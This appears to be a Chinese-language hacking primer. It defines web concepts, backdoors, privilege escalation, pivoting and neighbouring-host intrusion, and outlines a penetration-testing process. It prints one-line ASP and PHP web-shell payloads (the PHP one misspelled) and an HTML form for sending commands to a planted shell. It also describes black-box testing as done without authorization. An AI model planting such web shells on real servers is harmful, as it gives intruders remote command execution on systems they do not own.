黑客的基礎知識
基礎知識篇
需要了解的內容:
- 指令碼(asp、php、jsp)
- Html(css、js、html)
- http協議
- CMS(B/S)
- MD5
一句話木馬:通過向服務端提交一句簡短的程式碼,配合本地客戶端實現webshell功能的木馬
<%eval request(“pass”)%>
<%execute(request(“pass”))%>
注:request(“pass”)接受客戶端提交的資料 pass為執行命令的引數值 eval/execute函式執行客戶端命令的內容
如:PHP的一句話木馬
<?php evaal($_POST[cracer]);?>
下面的程式碼可以用POST的方式提交PHP語句,利用PHP指令碼的各種函式,就可以實現執行系統命令、修改資料庫、增刪、改檔案等等的各種功能。
<form method=post action=http://木馬地址>
<textarea name=cracer>
//這裡寫php程式碼
Phpinfo( );
</textarea>
<input type=submit>
</form>
提權:作業系統低許可權的賬戶將自己提升為管理員許可權使用的方法。
後門:黑客為了對主機進行長期的控制,在機器上種植的一段程式或留下的一個“入口”。
跳板:使用肉雞IP來實施攻擊的其他目標,以便更好的隱蔽自己的身份資訊。
旁站入侵:即同伺服器下的網站入侵,入侵之後可以通過提權跨目錄手段拿到目標網站的許可權。(常見的工具有:WebRobot、御劍、明小子和web線上查詢等)
C段入侵:即同C段下伺服器入侵,如,目標ip為192.168.1.253,入侵192.168.1.*的任意一臺機器然後利用一些黑客工具嗅探獲取在網路上傳輸的各種資訊。(常用工具:windows下有Cain,Unix環境下有Sniffit、Snoop、Tcpdump、Dsniff等)
滲透測試
黑盒測試:在未授權的情況下,模擬黑客的攻擊方法和思維方式來評估計算機網路系統可能存在著的安全風險。
黑盒測試不同於黑客入侵,並不等於黑站,黑盒測試考驗的是綜合的能力(OS、Datebase、Script、code、思路、社工)
思維與經驗積累往往決定成敗。
白盒測試:相對於黑盒測試,白盒測試基本是從內部發起。
黑白盒的另一種說法:知道原始碼和不知道原始碼的滲透測試。
這時,黑盒測試還是傳統的滲透測試,而白盒測試則偏向於程式碼審計。
流程
- 明確目標
確定範圍
確定規則
確定需求
- 資訊收集
基礎資訊
系統資訊
應用資訊
版本資訊
服務資訊
人員資訊
防護資訊
- 漏洞檢測
系統漏洞
WebServer漏洞
Web應用漏洞
其他埠服務漏洞
通訊安全
- 漏洞驗證
自動化驗證
手工驗證
實驗驗證
登入猜解
業務漏洞的驗證
公開資源的利用
- 資訊分析
精準打擊
繞過防禦機制
定製攻擊路徑
繞過檢測機制
攻擊程式碼
- 獲取所需
實施攻擊
獲取內部資訊
進一步滲透
持續性存在*
- 資訊整理
整理滲透工具
整理收集資訊
整理漏洞資訊
- 形成報告
按需整理
補充介紹
修補建議